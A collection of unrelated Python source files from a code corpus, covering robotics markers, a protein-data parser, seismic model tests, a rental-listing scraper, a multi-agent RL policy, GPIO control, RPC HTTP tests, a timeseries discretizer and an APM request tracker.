from cozmo.util import angle_z_to_quaternion, radians
from visualization_msgs.msg import Marker
class RectangularCuboid(object):
"""
An object class that stores information about a custom rectangular object
This object is composed of multiple cubes attached horizontally
"""
def __init__(self, num_cubes, pose, side_length):
"""
Parameters
----------
num_cubes : int
number of cubes that form this object
pose : (x, y, theta) of the object in (mm, mm, radians)
side_length : float
length of a side of the cube, in mm
"""
self.pose = pose
self.length = num_cubes * side_length
self.width = side_length
self.height = side_length
def update_object(self, cubes):
"""
Updates the object's pose given the cubes
Assumes cubes are attached horizontally
Parameters
----------
cubes : list containing LightCube objects
"""
x_positions = []
y_positions = []
for cube in cubes:
x_positions.append(cube.pose.position.x)
y_positions.append(cube.pose.position.y)
heading = cubes[0].pose.rotation.angle_z.radians
self.pose = (sum(x_positions) / len(cubes), sum(y_positions) / len(cubes), heading)
self.length = len(cubes) * self.width
def publish_cube(self, publisher, color=(0, 0.5, 0.5, 1)):
"""
Publishes the object as a cube Marker
Parameters
---------
publisher : ros publisher
color : tuple
(r, g, b, a) to represent the color of the cube
"""
cube_marker = Marker()
cube_marker.header.frame_id = "base_link"
cube_marker.type = Marker.CUBE
cube_marker.pose.position.x = self.pose[0] / 1000
cube_marker.pose.position.y = self.pose[1] / 1000
cube_marker.pose.position.z = self.height / 1000
cube_orientation = angle_z_to_quaternion(radians(self.pose[2]))
cube_marker.pose.orientation.x = cube_orientation[1]
cube_marker.pose.orientation.y = cube_orientation[2]
cube_marker.pose.orientation.z = cube_orientation[3]
cube_marker.pose.orientation.w = cube_orientation[0]
cube_marker.scale.x = self.width / 1000
cube_marker.scale.y = self.length / 1000
cube_marker.scale.z = self.width / 1000
cube_marker.color.r = color[0]
cube_marker.color.g = color[1]
cube_marker.color.b = color[2]
cube_marker.color.a = color[3]
publisher.publish(cube_marker)
def __str__(self):
return "Pose: %s, Length: %s, Width: %s" % \
(self.pose, self.length, self.width)
def __repr__(self):
return "RectangularCuboid(%s, %s, %s)" % (self.pose, self.length, self.width)
|
the-stack_0_25223
|
import evidence as evi
from copy import deepcopy
from collections import OrderedDict
def get_catalytic_activity(item, entity='all', as_cards=False):
from sabueso.cards import CatalyticActivityCard, catalytic_activity_dict
from ._add_reference_to_evidence import _add_reference_to_evidence
from ._get_reference_from_dbevidence import _get_reference_from_dbevidence
from ._get_reference_from_dbreference import _get_reference_from_dbreference
from .get_uniprot import get_uniprot
output = []
uniprot = get_uniprot(item, entity=entity)
ref_uniprot = uniprot.references[0]
### Info in comment
for comment in item['uniprot']['entry']['comment']:
if comment['@type']=='catalytic activity':
if type(comment)!=OrderedDict:
raise ValueError("Comment type not recognized for catalytic activity")
aux_dict=deepcopy(catalytic_activity_dict)
aux_dict['reaction']=evi.Evidence()
aux_dict['physiological_direction']=evi.Evidence()
aux_dict['reaction'].value=comment['reaction']['text']
if '@evidence' in comment['reaction']:
evidence_numbers = comment['reaction']['@evidence'].split(' ')
for ii in evidence_numbers:
ref = _get_reference_from_dbevidence(int(ii), item)
if ref is not None:
aux_dict['references'].append(ref)
aux_dict['reaction'].add_reference(ref)
if 'dbReference' in comment['reaction']:
                dbreference = comment['reaction']['dbReference']
if type(dbreference)==OrderedDict:
dbreference = [dbreference]
for aux in dbreference:
ref = _get_reference_from_dbreference(aux['@type'], aux['@id'])
aux_dict['references'].append(ref)
aux_dict['reaction'].add_reference(ref)
aux_dict['physiological_direction'].value=comment['physiologicalReaction']['@direction']
if '@evidence' in comment['physiologicalReaction']:
evidence_numbers = comment['physiologicalReaction']['@evidence'].split(' ')
for ii in evidence_numbers:
ref = _get_reference_from_dbevidence(int(ii), item)
if ref is not None:
aux_dict['references'].append(ref)
aux_dict['physiological_direction'].add_reference(ref)
if 'dbReference' in comment['physiologicalReaction']:
dbreference = comment['physiologicalReaction']['dbReference']
if type(dbreference)==OrderedDict:
dbreference = [dbreference]
for aux in dbreference:
ref = _get_reference_from_dbreference(aux['@type'], aux['@id'])
aux_dict['references'].append(ref)
aux_dict['physiological_direction'].add_reference(ref)
aux_dict['references'].append(ref_uniprot)
output.append(aux_dict)
if as_cards:
output = [CatalyticActivityCard(ii) for ii in output]
return output
|
the-stack_0_25224
|
# The Hazard Library
# Copyright (C) 2013-2018 GEM Foundation
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from openquake.hazardlib.gsim.boore_1993 import (
BooreEtAl1993GSCBest,
BooreEtAl1993GSCUpperLimit,
BooreEtAl1993GSCLowerLimit,
)
from openquake.hazardlib.tests.gsim.utils import BaseGSIMTestCase
# Test data provided by Geological Survey of Canada
class BooreEtAl1993GSCBestTestCase(BaseGSIMTestCase):
GSIM_CLASS = BooreEtAl1993GSCBest
def test_mean(self):
self.check('B93GSC/B93GSCBest_MEAN.csv',
max_discrep_percentage=0.1)
def test_std_total(self):
self.check('B93GSC/B93GSCBest_STD_TOTAL.csv',
max_discrep_percentage=0.1)
class BooreEtAl1993GSCUpperLimitTestCase(BaseGSIMTestCase):
GSIM_CLASS = BooreEtAl1993GSCUpperLimit
def test_mean(self):
self.check('B93GSC/B93GSCUpperLimit_MEAN.csv',
max_discrep_percentage=0.1)
def test_std_total(self):
self.check('B93GSC/B93GSCUpperLimit_STD_TOTAL.csv',
max_discrep_percentage=0.1)
class BooreEtAl1993GSCLowerLimitTestCase(BaseGSIMTestCase):
GSIM_CLASS = BooreEtAl1993GSCLowerLimit
def test_mean(self):
self.check('B93GSC/B93GSCLowerLimit_MEAN.csv',
max_discrep_percentage=0.1)
def test_std_total(self):
self.check('B93GSC/B93GSCLowerLimit_STD_TOTAL.csv',
max_discrep_percentage=0.1)
|
the-stack_0_25225
|
# Notes on xpath usage: https://blog.csdn.net/u013332124/article/details/80621638
import requests,io,sys,pandas
sys.stdout = io.TextIOWrapper(sys.stdout.buffer,encoding='gb18030') # change the default encoding of standard output
from lxml import etree
url = 'http://sz.xiaozhu.com/'
r = requests.get(url).text # fetch the page with requests
s = etree.HTML(r) # parse the HTML
title = s.xpath('//*[@id="page_list"]/ul/li/div[2]/div/a/span/text()') # short-term rental listing titles
price = s.xpath('//*[@id="page_list"]/ul/li/div[2]/span[1]/i/text()') # listing prices
latlng = s.xpath('//*[@id="page_list"]/ul/li/@latlng') # listing latitude/longitude
print(list(i for i in zip(title,price,latlng)))
|
the-stack_0_25229
|
import numpy as np
from ray.rllib.evaluation import MultiAgentEpisode
from ray.rllib.utils.typing import TensorType
from typing import List, Union, Optional, Dict, Tuple
from marltoolbox.algos.amTFT.base_policy import amTFTPolicyBase, OWN_COOP_POLICY_IDX, OWN_SELFISH_POLICY_IDX, \
OPP_SELFISH_POLICY_IDX, OPP_COOP_POLICY_IDX
from marltoolbox.utils import rollout
class amTFTRolloutsTorchPolicy(amTFTPolicyBase):
def __init__(self, observation_space, action_space, config, **kwargs):
super().__init__(observation_space, action_space, config, **kwargs)
self._init_for_rollout(self.config)
def _init_for_rollout(self, config):
self.last_k = 1
self.use_opponent_policies = False
self.rollout_length = config["rollout_length"]
self.n_rollout_replicas = config["n_rollout_replicas"]
self.performing_rollouts = False
self.overwrite_action = []
self.own_policy_id = config["own_policy_id"]
self.opp_policy_id = config["opp_policy_id"]
self.n_steps_to_punish_opponent = 0
# Don't support LSTM (at least because of action overwriting needed in the rollouts)
if "model" in config.keys():
if "use_lstm" in config["model"].keys():
assert not config["model"]["use_lstm"]
def compute_actions(
self,
obs_batch: Union[List[TensorType], TensorType],
state_batches: Optional[List[TensorType]] = None,
prev_action_batch: Union[List[TensorType], TensorType] = None,
prev_reward_batch: Union[List[TensorType], TensorType] = None,
info_batch: Optional[Dict[str, list]] = None,
episodes: Optional[List["MultiAgentEpisode"]] = None,
explore: Optional[bool] = None,
timestep: Optional[int] = None,
**kwargs) -> \
Tuple[TensorType, List[TensorType], Dict[str, TensorType]]:
# Option to overwrite action during internal rollouts
if self.use_opponent_policies:
if len(self.overwrite_action) > 0:
actions, state_out, extra_fetches = self.overwrite_action.pop(0)
if self.verbose > 1:
print("overwritten actions", actions, type(actions))
return actions, state_out, extra_fetches
return super().compute_actions(obs_batch, state_batches, prev_action_batch, prev_reward_batch,
info_batch, episodes, explore, timestep, **kwargs)
def _select_algo_to_use_in_eval(self):
if not self.use_opponent_policies:
if self.n_steps_to_punish == 0:
self.active_algo_idx = OWN_COOP_POLICY_IDX
elif self.n_steps_to_punish > 0:
self.active_algo_idx = OWN_SELFISH_POLICY_IDX
self.n_steps_to_punish -= 1
else:
raise ValueError("self.n_steps_to_punish can't be below zero")
else:
assert self.performing_rollouts
if self.n_steps_to_punish_opponent == 0:
self.active_algo_idx = OPP_COOP_POLICY_IDX
elif self.n_steps_to_punish_opponent > 0:
self.active_algo_idx = OPP_SELFISH_POLICY_IDX
self.n_steps_to_punish_opponent -= 1
else:
raise ValueError("self.n_steps_to_punish_opp can't be below zero")
def on_episode_step(self, opp_obs, last_obs, opp_action, worker, base_env, episode, env_index):
if not self.performing_rollouts:
super().on_episode_step(opp_obs, last_obs, opp_action, worker, base_env, episode, env_index)
def _compute_debit(self, last_obs, opp_action, worker, base_env, episode, env_index, coop_opp_simulated_action):
approximated_debit = self._compute_debit_using_rollouts(last_obs, opp_action, worker)
return approximated_debit
def _compute_debit_using_rollouts(self, last_obs, opp_action, worker):
n_steps_to_punish, policy_map, policy_agent_mapping = self._prepare_to_perform_virtual_rollouts_in_env(worker)
# Cooperative rollouts
mean_total_reward_for_totally_coop_opp, _ = self._compute_opp_mean_total_reward(worker, policy_map,
policy_agent_mapping,
partially_coop=False,
opp_action=None,
last_obs=last_obs)
# Cooperative rollouts with first action as the real one
mean_total_reward_for_partially_coop_opp, _ = self._compute_opp_mean_total_reward(worker, policy_map,
policy_agent_mapping,
partially_coop=True,
opp_action=opp_action,
last_obs=last_obs)
print("mean_total_reward_for_partially_coop_opp", mean_total_reward_for_partially_coop_opp)
print("mean_total_reward_for_totally_coop_opp", mean_total_reward_for_totally_coop_opp)
opp_reward_gain_from_picking_this_action = \
mean_total_reward_for_partially_coop_opp - mean_total_reward_for_totally_coop_opp
self._stop_performing_virtual_rollouts_in_env(n_steps_to_punish)
return opp_reward_gain_from_picking_this_action
def _prepare_to_perform_virtual_rollouts_in_env(self, worker):
self.performing_rollouts = True
self.use_opponent_policies = False
n_steps_to_punish = self.n_steps_to_punish
self.n_steps_to_punish = 0
self.n_steps_to_punish_opponent = 0
assert self.n_rollout_replicas // 2 > 0
policy_map = {policy_id: self for policy_id in worker.policy_map.keys()}
policy_agent_mapping = (lambda agent_id: self._switch_own_and_opp(agent_id))
return n_steps_to_punish, policy_map, policy_agent_mapping
def _stop_performing_virtual_rollouts_in_env(self, n_steps_to_punish):
self.performing_rollouts = False
self.use_opponent_policies = False
self.n_steps_to_punish = n_steps_to_punish
def _switch_own_and_opp(self, agent_id):
if agent_id != self.own_policy_id:
self.use_opponent_policies = True
else:
self.use_opponent_policies = False
return self.own_policy_id
def _compute_punishment_duration(self, opp_action, coop_opp_simulated_action, worker, last_obs):
return self._compute_punishment_duration_from_rollouts(worker, last_obs)
def _compute_punishment_duration_from_rollouts(self, worker, last_obs):
# self.performing_rollouts = True
# self.use_opponent_policies = False
# n_steps_to_punish = self.n_steps_to_punish
# assert self.n_rollout_replicas // 2 > 0
# policy_map = {policy_id: self for policy_id in worker.policy_map.keys()}
# policy_agent_mapping = (lambda agent_id: self._switch_own_and_opp(agent_id))
n_steps_to_punish, policy_map, policy_agent_mapping = self._prepare_to_perform_virtual_rollouts_in_env(worker)
self.k_opp_loss = {}
k_to_explore = self.last_k
self.debit_threshold_wt_multiplier = self.total_debit * self.punishment_multiplier
continue_to_search_k = True
while continue_to_search_k:
k_to_explore, continue_to_search_k = self._search_duration_of_future_punishment(
k_to_explore, worker, policy_map, policy_agent_mapping, last_obs)
self._stop_performing_virtual_rollouts_in_env(n_steps_to_punish)
self.last_k = k_to_explore
print("k_opp_loss", self.k_opp_loss)
print("k found", k_to_explore, "self.total_debit", self.total_debit,
"debit_threshold_wt_multiplier", self.debit_threshold_wt_multiplier)
return k_to_explore
def _search_duration_of_future_punishment(self, k_to_explore, worker, policy_map, policy_agent_mapping, last_obs):
_ = self._compute_opp_loss_for_one_k(k_to_explore, worker, policy_map, policy_agent_mapping, last_obs)
n_steps_played = self._compute_opp_loss_for_one_k(k_to_explore - 1, worker, policy_map, policy_agent_mapping,
last_obs)
continue_to_search_k = not self._is_k_found(k_to_explore)
if continue_to_search_k:
# If all the smallest k are already explored
if (self.k_opp_loss[k_to_explore - 1] > self.debit_threshold_wt_multiplier and (k_to_explore - 1) <= 1):
k_to_explore = 1
continue_to_search_k = False
return k_to_explore, continue_to_search_k
# If there is not enough steps to be perform remaining in the episode
# to compensate for the current total debit
if k_to_explore >= n_steps_played and self.k_opp_loss[k_to_explore] < self.debit_threshold_wt_multiplier:
print("n_steps_played", n_steps_played, "k_to_explore", k_to_explore)
k_to_explore = max(self.k_opp_loss.keys())
continue_to_search_k = False
return k_to_explore, continue_to_search_k
if self.k_opp_loss[k_to_explore] > self.debit_threshold_wt_multiplier:
k_to_explore = min(self.k_opp_loss.keys())
elif self.k_opp_loss[k_to_explore] < self.debit_threshold_wt_multiplier:
k_to_explore = max(self.k_opp_loss.keys()) + 1
return k_to_explore, continue_to_search_k
def _compute_opp_loss_for_one_k(self, k_to_explore, worker, policy_map, policy_agent_mapping, last_obs):
n_steps_played = 0
if self._is_k_out_of_bound(k_to_explore):
self.k_opp_loss[k_to_explore] = 0
elif k_to_explore not in self.k_opp_loss.keys():
opp_total_reward_loss, n_steps_played = self._compute_opp_total_reward_loss(k_to_explore, worker,
policy_map,
policy_agent_mapping,
last_obs=last_obs)
self.k_opp_loss[k_to_explore] = opp_total_reward_loss
if self.verbose > 0:
print(f"k_to_explore {k_to_explore}: {opp_total_reward_loss}")
return n_steps_played
def _is_k_out_of_bound(self, k_to_explore):
return k_to_explore <= 0 or k_to_explore > self.rollout_length
def _is_k_found(self, k_to_explore):
found_k = (self.k_opp_loss[k_to_explore] >= self.debit_threshold_wt_multiplier and
self.k_opp_loss[k_to_explore - 1] <= self.debit_threshold_wt_multiplier)
return found_k
def _compute_opp_total_reward_loss(self, k_to_explore, worker, policy_map, policy_agent_mapping, last_obs):
# Cooperative rollouts
coop_mean_total_reward, n_steps_played = self._compute_opp_mean_total_reward(worker, policy_map,
policy_agent_mapping,
partially_coop=False,
opp_action=None,
last_obs=last_obs)
        # Rollouts where both policies start by punishing for k_to_explore steps
partially_coop_mean_total_reward, _ = self._compute_opp_mean_total_reward(worker, policy_map,
policy_agent_mapping,
partially_coop=False,
opp_action=None, last_obs=last_obs,
k_to_explore=k_to_explore)
opp_total_reward_loss = coop_mean_total_reward - partially_coop_mean_total_reward
if self.verbose > 0:
print(f"partially_coop_mean_total_reward {partially_coop_mean_total_reward}")
print(f"coop_mean_total_reward {coop_mean_total_reward}")
print(f"opp_total_reward_loss {opp_total_reward_loss}")
return opp_total_reward_loss, n_steps_played
def _compute_opp_mean_total_reward(self, worker, policy_map, policy_agent_mapping, partially_coop: bool,
opp_action, last_obs, k_to_explore=0):
opp_total_rewards = []
for i in range(self.n_rollout_replicas // 2):
self.n_steps_to_punish = k_to_explore
self.n_steps_to_punish_opponent = k_to_explore
if partially_coop:
assert len(self.overwrite_action) == 0
self.overwrite_action = [(np.array([opp_action]), [], {}), ]
coop_rollout = rollout.internal_rollout(worker,
num_steps=self.rollout_length,
policy_map=policy_map,
last_obs=last_obs,
policy_agent_mapping=policy_agent_mapping,
reset_env_before=False,
num_episodes=1)
assert coop_rollout._num_episodes == 1, f"coop_rollout._num_episodes {coop_rollout._num_episodes}"
epi = coop_rollout._current_rollout
opp_rewards = [step[3][self.opp_policy_id] for step in epi]
# print("rewards", rewards)
opp_total_reward = sum(opp_rewards)
opp_total_rewards.append(opp_total_reward)
# print("total_rewards", total_rewards)
self.n_steps_to_punish = 0
self.n_steps_to_punish_opponent = 0
n_steps_played = len(epi)
opp_mean_total_reward = sum(opp_total_rewards) / len(opp_total_rewards)
return opp_mean_total_reward, n_steps_played
|
the-stack_0_25231
|
import RPi.GPIO as GPIO
import time
import threading
GPIO.setmode(GPIO.BCM)
BB = 17
GPIO.setup(BB,GPIO.OUT)
def Scan():
time.sleep(1)
GPIO.output(BB,True)
time.sleep(1)
GPIO.output(BB,False)
#code = input()
time.sleep(0.1)
return 0
#def GetCode():
# code = input("Code:")
# print(code)
# time.sleep(1)
#thread1 = threading.Thread(target = GetCode,args=())
#thread2 = threading.Thread(target = Scan,args=())
#thread1.start()
#time.sleep(1)
#thread2.start()
#thread1.join()
#thread2.join()
|
the-stack_0_25232
|
#!/usr/bin/env python3
# Copyright (c) 2014-2017 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test the RPC HTTP basics."""
from test_framework.test_framework import PivxTestFramework
from test_framework.util import *
import http.client
import urllib.parse
class HTTPBasicsTest (PivxTestFramework):
def set_test_params(self):
self.num_nodes = 3
def setup_network(self):
self.setup_nodes()
def run_test(self):
#################################################
# lowlevel check for http persistent connection #
#################################################
url = urllib.parse.urlparse(self.nodes[0].url)
authpair = url.username + ':' + url.password
headers = {"Authorization": "Basic " + str_to_b64str(authpair)}
conn = http.client.HTTPConnection(url.hostname, url.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
out1 = conn.getresponse().read()
assert(b'"error":null' in out1)
assert(conn.sock!=None) #according to http/1.1 connection must still be open!
#send 2nd request without closing connection
conn.request('POST', '/', '{"method": "getchaintips"}', headers)
out1 = conn.getresponse().read()
assert(b'"error":null' in out1) #must also response with a correct json-rpc message
assert(conn.sock!=None) #according to http/1.1 connection must still be open!
conn.close()
#same should be if we add keep-alive because this should be the std. behaviour
headers = {"Authorization": "Basic " + str_to_b64str(authpair), "Connection": "keep-alive"}
conn = http.client.HTTPConnection(url.hostname, url.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
out1 = conn.getresponse().read()
assert(b'"error":null' in out1)
assert(conn.sock!=None) #according to http/1.1 connection must still be open!
#send 2nd request without closing connection
conn.request('POST', '/', '{"method": "getchaintips"}', headers)
out1 = conn.getresponse().read()
assert(b'"error":null' in out1) #must also response with a correct json-rpc message
assert(conn.sock!=None) #according to http/1.1 connection must still be open!
conn.close()
#now do the same with "Connection: close"
headers = {"Authorization": "Basic " + str_to_b64str(authpair), "Connection":"close"}
conn = http.client.HTTPConnection(url.hostname, url.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
out1 = conn.getresponse().read()
assert(b'"error":null' in out1)
assert(conn.sock==None) #now the connection must be closed after the response
#node1 (2nd node) is running with disabled keep-alive option
urlNode1 = urllib.parse.urlparse(self.nodes[1].url)
authpair = urlNode1.username + ':' + urlNode1.password
headers = {"Authorization": "Basic " + str_to_b64str(authpair)}
conn = http.client.HTTPConnection(urlNode1.hostname, urlNode1.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
out1 = conn.getresponse().read()
assert(b'"error":null' in out1)
#node2 (third node) is running with standard keep-alive parameters which means keep-alive is on
urlNode2 = urllib.parse.urlparse(self.nodes[2].url)
authpair = urlNode2.username + ':' + urlNode2.password
headers = {"Authorization": "Basic " + str_to_b64str(authpair)}
conn = http.client.HTTPConnection(urlNode2.hostname, urlNode2.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
out1 = conn.getresponse().read()
assert(b'"error":null' in out1)
        assert(conn.sock!=None) #connection must still be open because pivxd should use keep-alive by default
# Check excessive request size
conn = http.client.HTTPConnection(urlNode2.hostname, urlNode2.port)
conn.connect()
conn.request('GET', '/' + ('x'*1000), '', headers)
out1 = conn.getresponse()
assert_equal(out1.status, http.client.NOT_FOUND)
conn = http.client.HTTPConnection(urlNode2.hostname, urlNode2.port)
conn.connect()
conn.request('GET', '/' + ('x'*10000), '', headers)
out1 = conn.getresponse()
assert_equal(out1.status, http.client.BAD_REQUEST)
if __name__ == '__main__':
HTTPBasicsTest ().main ()
|
the-stack_0_25233
|
from __future__ import absolute_import
from __future__ import print_function
import numpy as np
import platform
import pickle
import json
import os
class Discretizer:
def __init__(self, timestep=0.8, store_masks=True, impute_strategy='zero', start_time='zero',
config_path=os.path.join(os.path.dirname(__file__), 'resources/discretizer_config_more_features.json')):
with open(config_path) as f:
config = json.load(f)
self._id_to_channel = config['id_to_channel']
self._channel_to_id = dict(zip(self._id_to_channel, range(len(self._id_to_channel))))
self._is_categorical_channel = config['is_categorical_channel']
self._possible_values = config['possible_values']
self._normal_values = config['normal_values']
self._header = ["Hours"] + self._id_to_channel
self._timestep = timestep
self._store_masks = store_masks
self._start_time = start_time
self._impute_strategy = impute_strategy
# for statistics
self._done_count = 0
self._empty_bins_sum = 0
self._unused_data_sum = 0
def get_header(self):
new_header = []
for channel in self._id_to_channel:
if self._is_categorical_channel[channel]:
values = self._possible_values[channel]
for value in values:
new_header.append(channel + "->" + value)
else:
new_header.append(channel)
if self._store_masks:
for i in range(len(self._id_to_channel)):
channel = self._id_to_channel[i]
new_header.append("mask->" + channel)
return new_header
def transform(self, X, header=None, end=None):
if header is None:
header = self._header
assert header[0] == "Hours"
eps = 1e-6
N_channels = len(self._id_to_channel)
ts = [float(row[0]) for row in X]
for i in range(len(ts) - 1):
assert ts[i] < ts[i+1] + eps
if self._start_time == 'relative':
first_time = ts[0]
elif self._start_time == 'zero':
first_time = 0
else:
raise ValueError("start_time is invalid")
if end is None:
max_hours = max(ts) - first_time
else:
max_hours = end - first_time
N_bins = int(max_hours / self._timestep + 1.0 - eps)
cur_len = 0
begin_pos = [0 for i in range(N_channels)]
end_pos = [0 for i in range(N_channels)]
for i in range(N_channels):
channel = self._id_to_channel[i]
begin_pos[i] = cur_len
if self._is_categorical_channel[channel]:
end_pos[i] = begin_pos[i] + len(self._possible_values[channel])
else:
end_pos[i] = begin_pos[i] + 1
cur_len = end_pos[i]
data = np.zeros(shape=(N_bins, cur_len), dtype=float)
mask = np.zeros(shape=(N_bins, N_channels), dtype=int)
original_value = [["" for j in range(N_channels)] for i in range(N_bins)]
total_data = 0
unused_data = 0
def write(data, bin_id, channel, value, begin_pos):
def scrub_input(value):
'''
Remove all non numeric characters from a numerical input
'''
val = ''.join(c for c in value if (c.isdigit() or c == '.'))
#Handle case where '.' was used in val with no numbers
try:
return float(val)
except:
return 0.0
channel_id = self._channel_to_id[channel]
if self._is_categorical_channel[channel]:
category_id = self._possible_values[channel].index(value)
N_values = len(self._possible_values[channel])
one_hot = np.zeros((N_values,))
one_hot[category_id] = 1
for pos in range(N_values):
data[bin_id, begin_pos[channel_id] + pos] = one_hot[pos]
else:
value=scrub_input(value)
data[bin_id, begin_pos[channel_id]] = float(value)
for row in X:
t = float(row[0]) - first_time
if t > max_hours + eps:
continue
bin_id = int(t / self._timestep - eps)
assert 0 <= bin_id < N_bins
for j in range(1, len(row)):
if row[j] == "":
continue
channel = header[j]
channel_id = self._channel_to_id[channel]
total_data += 1
if mask[bin_id][channel_id] == 1:
unused_data += 1
mask[bin_id][channel_id] = 1
write(data, bin_id, channel, row[j], begin_pos)
original_value[bin_id][channel_id] = row[j]
# impute missing values
if self._impute_strategy not in ['zero', 'normal_value', 'previous', 'next']:
raise ValueError("impute strategy is invalid")
if self._impute_strategy in ['normal_value', 'previous']:
prev_values = [[] for i in range(len(self._id_to_channel))]
for bin_id in range(N_bins):
for channel in self._id_to_channel:
channel_id = self._channel_to_id[channel]
if mask[bin_id][channel_id] == 1:
prev_values[channel_id].append(original_value[bin_id][channel_id])
continue
if self._impute_strategy == 'normal_value':
imputed_value = self._normal_values[channel]
if self._impute_strategy == 'previous':
if len(prev_values[channel_id]) == 0:
imputed_value = self._normal_values[channel]
else:
imputed_value = prev_values[channel_id][-1]
write(data, bin_id, channel, imputed_value, begin_pos)
if self._impute_strategy == 'next':
prev_values = [[] for i in range(len(self._id_to_channel))]
for bin_id in range(N_bins-1, -1, -1):
for channel in self._id_to_channel:
channel_id = self._channel_to_id[channel]
if mask[bin_id][channel_id] == 1:
prev_values[channel_id].append(original_value[bin_id][channel_id])
continue
if len(prev_values[channel_id]) == 0:
imputed_value = self._normal_values[channel]
else:
imputed_value = prev_values[channel_id][-1]
write(data, bin_id, channel, imputed_value, begin_pos)
empty_bins = np.sum([1 - min(1, np.sum(mask[i, :])) for i in range(N_bins)])
self._done_count += 1
self._empty_bins_sum += empty_bins / (N_bins + eps)
self._unused_data_sum += unused_data / (total_data + eps)
if self._store_masks:
data = np.hstack([data, mask.astype(np.float32)])
# create new header
new_header = []
for channel in self._id_to_channel:
if self._is_categorical_channel[channel]:
values = self._possible_values[channel]
for value in values:
new_header.append(channel + "->" + value)
else:
new_header.append(channel)
if self._store_masks:
for i in range(len(self._id_to_channel)):
channel = self._id_to_channel[i]
new_header.append("mask->" + channel)
new_header = ",".join(new_header)
return (data, new_header)
def print_statistics(self):
print("statistics of discretizer:")
print("\tconverted {} examples".format(self._done_count))
print("\taverage unused data = {:.2f} percent".format(100.0 * self._unused_data_sum / self._done_count))
print("\taverage empty bins = {:.2f} percent".format(100.0 * self._empty_bins_sum / self._done_count))
class Normalizer:
def __init__(self, fields=None):
self._means = None
self._stds = None
self._fields = None
if fields is not None:
self._fields = [col for col in fields]
self._sum_x = None
self._sum_sq_x = None
self._count = 0
def _feed_data(self, x):
x = np.array(x)
self._count += x.shape[0]
if self._sum_x is None:
self._sum_x = np.sum(x, axis=0)
self._sum_sq_x = np.sum(x**2, axis=0)
else:
self._sum_x += np.sum(x, axis=0)
self._sum_sq_x += np.sum(x**2, axis=0)
def _save_params(self, save_file_path):
eps = 1e-7
with open(save_file_path, "wb") as save_file:
N = self._count
self._means = 1.0 / N * self._sum_x
self._stds = np.sqrt(1.0/(N - 1) * (self._sum_sq_x - 2.0 * self._sum_x * self._means + N * self._means**2))
self._stds[self._stds < eps] = eps
pickle.dump(obj={'means': self._means,
'stds': self._stds},
file=save_file,
protocol=2)
def load_params(self, load_file_path):
with open(load_file_path, "rb") as load_file:
if platform.python_version()[0] == '2':
dct = pickle.load(load_file)
else:
dct = pickle.load(load_file, encoding='latin1')
self._means = dct['means']
self._stds = dct['stds']
def transform(self, X):
if self._fields is None:
fields = range(X.shape[1])
else:
fields = self._fields
ret = 1.0 * X
for col in fields:
ret[:, col] = (X[:, col] - self._means[col]) / self._stds[col]
return ret
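# Hedged usage sketch (not part of the original module): `episode` is assumed to be
# a list of timeseries rows whose first column is the time in hours and whose other
# columns match `header`; the pickle path is hypothetical.
def _example_discretize_and_normalize(episode, header):
    discretizer = Discretizer(timestep=0.8, store_masks=True,
                              impute_strategy='previous', start_time='zero')
    data, new_header = discretizer.transform(episode, header=header)
    normalizer = Normalizer()
    normalizer._feed_data(data)
    normalizer._save_params("example_normalizer.pkl")
    normalizer.load_params("example_normalizer.pkl")
    return normalizer.transform(data), new_header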
|
the-stack_0_25235
|
from __future__ import absolute_import, division, print_function, unicode_literals
import logging
from datetime import datetime
from uuid import uuid4
import scout_apm.core.backtrace
from scout_apm.core.n_plus_one_call_set import NPlusOneCallSet
from scout_apm.core.request_manager import RequestManager
from scout_apm.core.samplers import Memory, Samplers
from scout_apm.core.thread_local import ThreadLocalSingleton
try:
from scout_apm.core import objtrace
except ImportError:
objtrace = None
logger = logging.getLogger(__name__)
class TrackedRequest(ThreadLocalSingleton):
"""
This is a container which keeps track of all module instances for a single
request. For convenience they are made available as attributes based on
their keyname
"""
def __init__(self, *args, **kwargs):
self.req_id = "req-" + str(uuid4())
self.start_time = kwargs.get("start_time", datetime.utcnow())
self.end_time = kwargs.get("end_time", None)
self.active_spans = kwargs.get("active_spans", [])
self.complete_spans = kwargs.get("complete_spans", [])
self.tags = kwargs.get("tags", {})
self.real_request = kwargs.get("real_request", False)
self.memory_start = kwargs.get("memory_start", Memory.rss_in_mb())
self.callset = NPlusOneCallSet()
logger.debug("Starting request: %s", self.req_id)
def mark_real_request(self):
self.real_request = True
def is_real_request(self):
return self.real_request
def tag(self, key, value):
if key in self.tags:
logger.debug(
"Overwriting previously set tag for request %s: %s", self.req_id, key
)
self.tags[key] = value
def start_span(self, *args, **kwargs):
maybe_parent = self.current_span()
if maybe_parent is not None:
parent_id = maybe_parent.span_id
if maybe_parent.ignore_children:
kwargs["ignore"] = True
kwargs["ignore_children"] = True
else:
parent_id = None
kwargs["parent"] = parent_id
kwargs["request_id"] = self.req_id
new_span = Span(**kwargs)
self.active_spans.append(new_span)
return new_span
def stop_span(self):
try:
stopping_span = self.active_spans.pop()
except IndexError as e:
logger.debug("Exception when stopping span: %r", e)
else:
stopping_span.stop()
if not stopping_span.ignore:
stopping_span.annotate()
self.complete_spans.append(stopping_span)
if len(self.active_spans) == 0:
self.finish()
def current_span(self):
if len(self.active_spans) > 0:
return self.active_spans[-1]
else:
return None
# Request is done, release any info we have about it.
def finish(self):
logger.debug("Stopping request: %s", self.req_id)
if self.end_time is None:
self.end_time = datetime.utcnow()
if self.is_real_request():
self.tag("mem_delta", Memory.get_delta(self.memory_start))
if not self.is_ignored():
RequestManager.instance().add_request(self)
Samplers.ensure_running()
# This can fail if the Tracked Request was created directly,
# not through instance()
try:
self.release()
except Exception:
pass
# A request is ignored if the tag "ignore_transaction" is set to True
